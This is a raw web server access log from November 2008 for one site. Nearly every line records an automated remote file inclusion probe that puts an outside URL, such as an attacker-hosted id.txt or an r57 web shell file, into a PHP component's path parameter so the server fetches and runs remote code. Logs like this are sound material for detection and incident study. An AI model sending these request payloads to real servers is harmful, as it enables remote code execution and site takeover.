64.235.52.184 - - [29/Nov/2008:09:03:06 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:03:07 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:03:09 -0800] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:03:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:03:16 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:03:16 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:03:17 -0800] "GET /logs//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:03:20 -0800] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:03:20 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:03:20 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:03:30 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:03:43 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:03:44 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:03:55 -0800] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:03:55 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:09:03:58 -0800] "GET /logs/access_080930.log/index.php?go=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:01 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:02 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:02 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:03 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:03 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:04:12 -0800] "GET /logs/access_080703.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:04:12 -0800] "GET /logs/access_080518.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:04:15 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:04:15 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:04:15 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:04:19 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:24 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:27 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:28 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:29 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:29 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:29 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:04:34 -0800] "GET /logs//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:04:34 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:38 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:38 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:04:40 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:42 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:04:42 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:04:57 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:05:03 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:05:04 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:05:04 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:05:04 -0800] "GET /logs//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:06 -0800] "GET /logs/access_080509.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:05:06 -0800] "GET /logs/access_081010.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:05:07 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:05:07 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:08 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 200 95082 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:10 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:05:15 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:22 -0800] "GET /logs/access_080509.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:23 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 200 95064 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:26 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:05:27 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:05:35 -0800] "GET /logs/access_080816.log%20//pjsfiles/modify.php?installed_config_file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:05:43 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:05:54 -0800] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:05:58 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:06:02 -0800] "GET /logs/access_080529.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:06:03 -0800] "GET /logs/access_080717.log//signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:06:04 -0800] "GET /signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:06:04 -0800] "GET /logs//signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:06:05 -0800] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:06 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:06 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:06:07 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:06:07 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:15 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:06:24 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:25 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:25 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:25 -0800] "GET /logs/access_071220.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:06:28 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:06:29 -0800] "GET /logs/access_080102.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:06:39 -0800] "GET /vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:06:39 -0800] "GET /logs//vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:06:45 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:06:45 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:06:45 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:06:47 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:06:48 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:09:06:49 -0800] "GET /logs/access_080316.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:06:49 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:09:06:50 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:09:06:50 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:06:54 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:06:54 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:06:54 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:07:03 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:07:04 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:07:04 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:07:04 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:07:09 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:32 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:49 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:49 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:07:49 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:09:08:02 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:09:08:02 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:09:08:02 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:09:08:03 -0800] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:06 -0800] "GET /logs/access_081008.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:07 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:07 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:11 -0800] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:11 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:08:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.27.28.240 - - [29/Nov/2008:09:08:19 -0800] "GET /logs/access_080414.log HTTP/1.1" 200 1336556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
